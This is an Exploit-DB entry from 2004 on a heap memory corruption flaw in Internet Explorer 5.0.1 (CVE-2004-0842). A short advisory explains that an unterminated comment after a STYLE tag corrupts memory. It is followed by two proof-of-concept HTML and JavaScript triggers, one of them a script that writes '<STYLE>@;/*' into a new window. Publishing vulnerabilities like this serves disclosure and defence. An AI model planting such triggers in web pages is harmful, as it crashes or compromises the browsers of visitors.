Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability

2004-07-08T00:00:00
ID EDB-ID:24328
Type exploitdb
Reporter Phuong Nguyen
Modified 2004-07-08T00:00:00

Description

Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability. CVE-2004-0842. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/10816/info

A heap overflow vulnerability has been discovered in Internet Explorer. It is reported that the issue presents itself when a comment character sequence that is not terminated is encountered after a STYLE tag.

This issue could be exploited by a remote attacker to execute arbitrary code in the context of the client user. The attacker would likely create a malicious HTML page and host it on a site. The attacker would then attempt to entice a user to visit the malicious page to carry out a successful attack.

<style>;@/* 

And by "Berend-Jan Wever" <skylined@edup.tudelft.nl>:

<SCRIPT>
d = window.open().document;
d.write("x");
d.body.innerHTML = "<STYLE>@;/*";
</SCRIPT>